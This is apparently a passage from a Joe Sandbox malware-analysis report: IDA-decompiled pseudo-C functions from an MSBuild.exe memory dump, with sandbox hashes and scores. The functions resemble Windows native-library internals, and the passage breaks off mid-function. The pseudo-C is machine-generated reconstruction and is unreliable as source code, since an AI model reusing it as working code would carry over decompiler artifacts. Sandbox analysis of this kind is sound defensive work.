                                            				_v8 =  *0x10fd360 ^ _t84;
                                            				_v536 = 0x200;
                                            				_t79 = 0;
                                            				_v548 = __edx;
                                            				_v544 = 0;
                                            				_t62 = __ecx;
                                            				_v540 = 0;
                                            				_v532 =  &_v524;
                                            				if(__edx == 0 || __ecx == 0) {
                                            					L6:
                                            					return E0104B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                            				} else {
                                            					_v528 = 0;
                                            					E0101E9C0(1, __ecx, 0, 0,  &_v528);
                                            					_t44 = _v528;
                                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                            					_t46 = 0xa;
                                            					_t87 = _t81 - _t46;
                                            					if(_t87 > 0 || _t87 == 0) {
                                            						 *_v548 = 0xfe1180;
                                            						L5:
                                            						_t79 = 1;
                                            						goto L6;
                                            					} else {
                                            						_t48 = E01031DB5(_t62,  &_v532,  &_v536);
                                            						_t76 = _v528;
                                            						if(_t48 == 0) {
                                            							L9:
                                            							E01043C2A(_t81, _t76,  &_v544);
                                            							 *_v548 = _v544;
                                            							goto L5;
                                            						}
                                            						_t62 = _v532;
                                            						if(_t62 != 0) {
                                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                            							_t53 =  *_t62;
                                            							_v528 = _t53;
                                            							if(_t53 != 0) {
                                            								_t63 = _t62 + 4;
                                            								_t55 = _v528;
                                            								do {
                                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                            										if(E01018999(_t63,  &_v540) == 0) {
                                            											_t55 = _v528;
                                            										} else {
                                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                            											_t55 = _v528;
                                            											if(_t75 >= _t83) {
                                            												_t83 = _t75;
                                            											}
                                            										}
                                            									}
                                            									_t63 = _t63 + 0x14;
                                            									_t55 = _t55 - 1;
                                            									_v528 = _t55;
                                            								} while (_t55 != 0);
                                            								_t62 = _v532;
                                            							}
                                            							if(_t62 !=  &_v524) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                            							}
                                            							_t76 = _t83 & 0x0000ffff;
                                            							_t81 = _t83 >> 0x10;
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010CAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				signed int _v16;
                                            				signed char _v20;
                                            				intOrPtr _v24;
                                            				char* _t37;
                                            				void* _t47;
                                            				signed char _t51;
                                            				void* _t53;
                                            				char _t55;
                                            				intOrPtr _t57;
                                            				signed char _t61;
                                            				intOrPtr _t75;
                                            				void* _t76;
                                            				signed int _t81;
                                            				intOrPtr _t82;
                                            
                                            				_t53 = __ecx;
                                            				_t55 = 0;
                                            				_v20 = _v20 & 0;
                                            				_t75 = __edx;
                                            				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                            				_v24 = __edx;
                                            				_v12 = 0;
                                            				if((_t81 & 0x01000000) != 0) {
                                            					L5:
                                            					if(_a8 != 0) {
                                            						_t81 = _t81 | 0x00000008;
                                            					}
                                            					_t57 = E010CABF4(_t55 + _t75, _t81);
                                            					_v8 = _t57;
                                            					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                            						_t76 = 0;
                                            						_v16 = _v16 & 0;
                                            					} else {
                                            						_t59 = _t53;
                                            						_t76 = E010CAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                            						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                            							_t47 = E010CAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                            							_t61 = _v20;
                                            							if(_t61 != 0) {
                                            								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                            								if(E010ACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                            									L010277F0(_t53, 0, _t76);
                                            									_t76 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_t82 = _v8;
                                            					L16:
                                            					if(E01027D50() == 0) {
                                            						_t37 = 0x7ffe0380;
                                            					} else {
                                            						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E010C131B(_t53, _t76, _t82, _v16);
                                            					}
                                            					return _t76;
                                            				}
                                            				_t51 =  *(__ecx + 0x20);
                                            				_v20 = _t51;
                                            				if(_t51 == 0) {
                                            					goto L5;
                                            				}
                                            				_t81 = _t81 | 0x00000008;
                                            				if(E010ACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                            					_t55 = _v12;
                                            					goto L5;
                                            				} else {
                                            					_t82 = 0;
                                            					_t76 = 0;
                                            					_v16 = _v16 & 0;
                                            					goto L16;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E010CFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                            				char _v8;
                                            				signed int _v12;
                                            				signed int _t29;
                                            				char* _t32;
                                            				char* _t43;
                                            				signed int _t80;
                                            				signed int* _t84;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t56 = __edx;
                                            				_t84 = __ecx;
                                            				_t80 = E010CFD4E(__ecx, __edx);
                                            				_v12 = _t80;
                                            				if(_t80 != 0) {
                                            					_t29 =  *__ecx & _t80;
                                            					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                            					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                            						E010D0A13(__ecx, _t80, 0, _a4);
                                            						_t80 = 1;
                                            						if(E01027D50() == 0) {
                                            							_t32 = 0x7ffe0380;
                                            						} else {
                                            							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            						}
                                            						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            							_push(3);
                                            							L21:
                                            							E010C1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                            						}
                                            						goto L22;
                                            					}
                                            					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                            						_t80 = E010D2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                            						if(_t80 != 0) {
                                            							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                            							_t77 = _v8;
                                            							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                            								E010CC8F7(_t66, _t77, 0);
                                            							}
                                            						}
                                            					} else {
                                            						_t80 = E010CDBD2(__ecx[0xb], _t74, __edx, _a4);
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t43 = 0x7ffe0380;
                                            					} else {
                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                            						goto L22;
                                            					} else {
                                            						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                            						goto L21;
                                            					}
                                            				} else {
                                            					_push(__ecx);
                                            					_push(_t80);
                                            					E010CA80D(__ecx[0xf], 9, __edx, _t80);
                                            					L22:
                                            					return _t80;
                                            				}
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction ID: 86b37a9c2d0582a3f313f7f752fa6830742487ab437637c1394c0ba8ec71960c
                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction Fuzzy Hash: D731D332200642AFD7229768C854FAE7BEBEF85F50F18409DE5C58B342DA74D842CF52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E010CEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                            				signed int _v8;
                                            				char _v12;
                                            				intOrPtr _v15;
                                            				char _v16;
                                            				intOrPtr _v19;
                                            				void* _v28;
                                            				intOrPtr _v36;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t26;
                                            				signed int _t27;
                                            				char* _t40;
                                            				unsigned int* _t50;
                                            				intOrPtr* _t58;
                                            				unsigned int _t59;
                                            				char _t75;
                                            				signed int _t86;
                                            				intOrPtr _t88;
                                            				intOrPtr* _t91;
                                            
                                            				_t75 = __edx;
                                            				_t91 = __ecx;
                                            				_v12 = __edx;
                                            				_t50 = __ecx + 0x30;
                                            				_t86 = _a4 & 0x00000001;
                                            				if(_t86 == 0) {
                                            					E01022280(_t26, _t50);
                                            					_t75 = _v16;
                                            				}
                                            				_t58 = _t91;
                                            				_t27 = E010CE815(_t58, _t75);
                                            				_v8 = _t27;
                                            				if(_t27 != 0) {
                                            					E0100F900(_t91 + 0x34, _t27);
                                            					if(_t86 == 0) {
                                            						E0101FFB0(_t50, _t86, _t50);
                                            					}
                                            					_push( *((intOrPtr*)(_t91 + 4)));
                                            					_push( *_t91);
                                            					_t59 =  *(_v8 + 0x10);
                                            					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                            					_push(0x8000);
                                            					_t11 = _t53 - 1; // 0x0
                                            					_t12 = _t53 - 1; // 0x0
                                            					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                            					E010CAFDE( &_v12,  &_v16);
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					E010CBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                            					_t55 = _v36;
                                            					_t88 = _v36;
                                            					if(E01027D50() == 0) {
                                            						_t40 = 0x7ffe0388;
                                            					} else {
                                            						_t55 = _v19;
                                            						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t40 != 0) {
                                            						E010BFE3F(_t55, _t91, _v15, _t55);
                                            					}
                                            				} else {
                                            					if(_t86 == 0) {
                                            						E0101FFB0(_t50, _t86, _t50);
                                            						_t75 = _v16;
                                            					}
                                            					_push(_t58);
                                            					_t88 = 0;
                                            					_push(0);
                                            					E010CA80D(_t91, 8, _t75, 0);
                                            				}
                                            				return _t88;
                                            			}























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction ID: b5cc6afdee05c72c3da45c1c9595a81c1476e3ed23a024ee45a577b475cf920a
                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction Fuzzy Hash: CE31B4726047069FC719DF28C880AAFBBE9FFD0610F04492DF59687645DE34E809CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E010869A6(signed short* __ecx, void* __eflags) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				intOrPtr _v36;
                                            				signed int _v40;
                                            				char* _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				signed int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				char _v72;
                                            				signed short* _v76;
                                            				signed int _v80;
                                            				char _v84;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t68;
                                            				intOrPtr _t73;
                                            				signed short* _t74;
                                            				void* _t77;
                                            				void* _t78;
                                            				signed int _t79;
                                            				signed int _t80;
                                            
                                            				_v8 =  *0x10fd360 ^ _t80;
                                            				_t75 = 0x100;
                                            				_v64 = _v64 & 0x00000000;
                                            				_v76 = __ecx;
                                            				_t79 = 0;
                                            				_t68 = 0;
                                            				_v72 = 1;
                                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                            				_t77 = 0;
                                            				if(L01016C59(__ecx[2], 0x100, __eflags) != 0) {
                                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                            					if(_t79 != 0 && E01086BA3() != 0) {
                                            						_push(0);
                                            						_push(0);
                                            						_push(0);
                                            						_push(0x1f0003);
                                            						_push( &_v64);
                                            						if(E01049980() >= 0) {
                                            							E01022280(_t56, 0x10f8778);
                                            							_t77 = 1;
                                            							_t68 = 1;
                                            							if( *0x10f8774 == 0) {
                                            								asm("cdq");
                                            								 *(_t79 + 0xf70) = _v64;
                                            								 *(_t79 + 0xf74) = 0x100;
                                            								_t75 = 0;
                                            								_t73 = 4;
                                            								_v60 =  &_v68;
                                            								_v52 = _t73;
                                            								_v36 = _t73;
                                            								_t74 = _v76;
                                            								_v44 =  &_v72;
                                            								 *0x10f8774 = 1;
                                            								_v56 = 0;
                                            								_v28 = _t74[2];
                                            								_v48 = 0;
                                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                            								_v40 = 0;
                                            								_v32 = 0;
                                            								_v24 = 0;
                                            								_v16 = 0;
                                            								if(E0100B6F0(0xfec338, 0xfec288, 3,  &_v60) == 0) {
                                            									_v80 = _v80 | 0xffffffff;
                                            									_push( &_v84);
                                            									_push(0);
                                            									_push(_v64);
                                            									_v84 = 0xfa0a1f00;
                                            									E01049520();
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				if(_v64 != 0) {
                                            					_push(_v64);
                                            					E010495D0();
                                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                            				}
                                            				if(_t77 != 0) {
                                            					E0101FFB0(_t68, _t77, 0x10f8778);
                                            				}
                                            				_pop(_t78);
                                            				return E0104B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                            			}

































                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 500c4559b9dd26f8c36089d0dc6a4c29c36862d97c8e8571b3443ac451eb14ab
                                            • Instruction ID: ef81778e7430d1fdc89e56a5677d4b684caa124fea41dcabee472fff08f24186
                                            • Opcode Fuzzy Hash: 500c4559b9dd26f8c36089d0dc6a4c29c36862d97c8e8571b3443ac451eb14ab
                                            • Instruction Fuzzy Hash: 114179B1D00209AFDB20DFAAD841BFEFBF8EF48714F14816AE994A7240DB759905CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E01005210(intOrPtr _a4, void* _a8) {
                                            				void* __ecx;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            				signed int _t33;
                                            				intOrPtr _t35;
                                            				signed int _t52;
                                            				void* _t54;
                                            				void* _t56;
                                            				unsigned int _t59;
                                            				signed int _t60;
                                            				void* _t61;
                                            
                                            				_t61 = E010052A5(1);
                                            				if(_t61 == 0) {
                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                            				} else {
                                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                            				}
                                            				_t60 = _t59 >> 1;
                                            				_t32 = 0x3a;
                                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                            					_t52 = _t60 + _t60;
                                            					if(_a4 > _t52) {
                                            						goto L5;
                                            					}
                                            					if(_t61 != 0) {
                                            						asm("lock xadd [esi], eax");
                                            						if((_t32 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            						}
                                            					} else {
                                            						E0101EB70(_t54, 0x10f79a0);
                                            					}
                                            					_t26 = _t52 + 2; // 0xddeeddf0
                                            					return _t26;
                                            				} else {
                                            					_t52 = _t60 + _t60;
                                            					if(_a4 < _t52) {
                                            						if(_t61 != 0) {
                                            							asm("lock xadd [esi], eax");
                                            							if((_t32 | 0xffffffff) == 0) {
                                            								_push( *((intOrPtr*)(_t61 + 4)));
                                            								E010495D0();
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            							}
                                            						} else {
                                            							E0101EB70(_t54, 0x10f79a0);
                                            						}
                                            						return _t52;
                                            					}
                                            					L5:
                                            					_t33 = E0104F3E0(_a8, _t54, _t52);
                                            					if(_t61 == 0) {
                                            						E0101EB70(_t54, 0x10f79a0);
                                            					} else {
                                            						asm("lock xadd [esi], eax");
                                            						if((_t33 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            						}
                                            					}
                                            					_t35 = _a8;
                                            					if(_t60 <= 1) {
                                            						L9:
                                            						_t60 = _t60 - 1;
                                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                                            						goto L10;
                                            					} else {
                                            						_t56 = 0x3a;
                                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                            							 *((short*)(_t52 + _t35)) = 0;
                                            							L10:
                                            							return _t60 + _t60;
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            			}















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0b3925b124aca02bfc7e56299a95296ecf318382ae4ae9f5dc9f529f3384af0
                                            • Instruction ID: f34ee5933672b222f4a29d75444f3bb05a783216ecd98c63b770daccd7c9a13c
                                            • Opcode Fuzzy Hash: e0b3925b124aca02bfc7e56299a95296ecf318382ae4ae9f5dc9f529f3384af0
                                            • Instruction Fuzzy Hash: 6331F431681612EBD723AB18CC81BAE77A9FF71760F118729F9D50B5E4DB70E900CA91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01043D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				signed short** _t33;
                                            				short* _t38;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t41;
                                            				signed short _t43;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t53;
                                            				signed short _t57;
                                            				intOrPtr _t58;
                                            				signed short _t60;
                                            				signed short* _t61;
                                            
                                            				_t47 = __ecx;
                                            				_t61 = __edx;
                                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                            				if(_t60 > 0xfffe) {
                                            					L22:
                                            					return 0xc0000106;
                                            				}
                                            				if(__edx != 0) {
                                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                            						L5:
                                            						E01017B60(0, _t61, 0xfe11c4);
                                            						_v12 =  *_t47;
                                            						_v12 = _v12 + 0xfff8;
                                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                            						E01017B60(0xfff8, _t61,  &_v12);
                                            						_t33 = _a8;
                                            						if(_t33 != 0) {
                                            							 *_t33 = _t61;
                                            						}
                                            						_t12 =  &(_t61[2]); // 0x100f0e0d
                                            						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                            						_t53 = _a12;
                                            						if(_t53 != 0) {
                                            							_t57 = _t61[2];
                                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                            							while(_t38 >= _t57) {
                                            								if( *_t38 == 0x5c) {
                                            									_t41 = _t38 + 2;
                                            									if(_t41 == 0) {
                                            										break;
                                            									}
                                            									_t58 = 0;
                                            									if( *_t41 == 0) {
                                            										L19:
                                            										 *_t53 = _t58;
                                            										goto L7;
                                            									}
                                            									 *_t53 = _t41;
                                            									goto L7;
                                            								}
                                            								_t38 = _t38 - 2;
                                            							}
                                            							_t58 = 0;
                                            							goto L19;
                                            						} else {
                                            							L7:
                                            							_t39 = _a16;
                                            							if(_t39 != 0) {
                                            								 *_t39 = 0;
                                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                            							}
                                            							return 0;
                                            						}
                                            					}
                                            					_t61 = _a4;
                                            					if(_t61 != 0) {
                                            						L3:
                                            						_t43 = L01024620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                            						_t61[2] = _t43;
                                            						if(_t43 == 0) {
                                            							return 0xc0000017;
                                            						}
                                            						_t61[1] = _t60;
                                            						 *_t61 = 0;
                                            						goto L5;
                                            					}
                                            					goto L22;
                                            				}
                                            				_t61 = _a4;
                                            				if(_t61 == 0) {
                                            					return 0xc000000d;
                                            				}
                                            				goto L3;
                                            			}

















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d57256685cbece279e175d3aef7f96f3dc730e58117f39bc72eba63658421c70
                                            • Instruction ID: d4e7d3eae51102b2b4d8f3ba819e1052c75da86c960b2e2ef8a88f11f0bc913b
                                            • Opcode Fuzzy Hash: d57256685cbece279e175d3aef7f96f3dc730e58117f39bc72eba63658421c70
                                            • Instruction Fuzzy Hash: E4318DB1A016259BD7259F2ED481A6ABBE5FF4571070580BAE9C6CF290E730D840C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0103A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				intOrPtr _t39;
                                            				intOrPtr _t45;
                                            				intOrPtr* _t51;
                                            				intOrPtr* _t52;
                                            				intOrPtr* _t55;
                                            				signed int _t57;
                                            				intOrPtr* _t59;
                                            				intOrPtr _t68;
                                            				intOrPtr* _t77;
                                            				void* _t79;
                                            				signed int _t80;
                                            				intOrPtr _t81;
                                            				char* _t82;
                                            				void* _t83;
                                            
                                            				_push(0x24);
                                            				_push(0x10e0220);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                            				_t79 = __ecx;
                                            				_t35 =  *0x10f7b9c; // 0x0
                                            				_t55 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                            				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                            				if(_t55 == 0) {
                                            					_t39 = 0xc0000017;
                                            					L11:
                                            					return E0105D0D1(_t39);
                                            				}
                                            				_t68 = 0;
                                            				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                            				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                            				_t7 = _t55 + 8; // 0x8
                                            				_t57 = 6;
                                            				memcpy(_t7, _t79, _t57 << 2);
                                            				_t80 = 0xfffffffe;
                                            				 *(_t83 - 4) = _t80;
                                            				if(0 < 0) {
                                            					L14:
                                            					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                            					L20:
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                            					_t39 = _t81;
                                            					goto L11;
                                            				}
                                            				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                            					_t81 = 0xc000007b;
                                            					goto L20;
                                            				}
                                            				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                            					_t59 =  *((intOrPtr*)(_t83 + 8));
                                            					_t45 =  *_t59;
                                            					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                            					 *_t59 = _t45 + 1;
                                            					L6:
                                            					 *(_t83 - 4) = 1;
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                            					 *(_t83 - 4) = _t80;
                                            					if(_t68 < 0) {
                                            						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                            						if(_t82 == 0) {
                                            							goto L14;
                                            						}
                                            						asm("btr eax, ecx");
                                            						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                            						if( *_t82 != 0) {
                                            							 *0x10f7b10 =  *0x10f7b10 - 8;
                                            						}
                                            						goto L20;
                                            					}
                                            					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                            					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                            					_t51 =  *0x10f536c; // 0x771a5368
                                            					if( *_t51 != 0x10f5368) {
                                            						_push(3);
                                            						asm("int 0x29");
                                            						goto L14;
                                            					}
                                            					 *_t55 = 0x10f5368;
                                            					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                            					 *_t51 = _t55;
                                            					 *0x10f536c = _t55;
                                            					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                            					if(_t52 != 0) {
                                            						 *_t52 = _t55;
                                            					}
                                            					_t39 = 0;
                                            					goto L11;
                                            				}
                                            				_t77 =  *((intOrPtr*)(_t83 + 8));
                                            				_t68 = E0103A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                            				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                            				if(_t68 < 0) {
                                            					goto L14;
                                            				}
                                            				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                            				goto L6;
                                            			}



















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa6957a47311605f10de27210c7b4641ce5d01d49cad447be968b0b0d75314d2
                                            • Instruction ID: 04af2a1e3bc84d96aa42d21ea8e1f33a976570a34da671ba2f37736ed7d5696a
                                            • Opcode Fuzzy Hash: aa6957a47311605f10de27210c7b4641ce5d01d49cad447be968b0b0d75314d2
                                            • Instruction Fuzzy Hash: F04159B5B00209DFCB15CF58C990BA9BBF5FB89314F1580ADE985EB344C779A901CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0102C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                            				signed int* _v8;
                                            				char _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t33;
                                            				signed char _t43;
                                            				signed char _t48;
                                            				signed char _t62;
                                            				void* _t63;
                                            				intOrPtr _t69;
                                            				intOrPtr _t71;
                                            				unsigned int* _t82;
                                            				void* _t83;
                                            
                                            				_t80 = __ecx;
                                            				_t82 = __edx;
                                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                            				if((_t33 & 0x00000001) != 0) {
                                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                            					if(E01027D50() != 0) {
                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            					} else {
                                            						_t43 = 0x7ffe0386;
                                            					}
                                            					if( *_t43 != 0) {
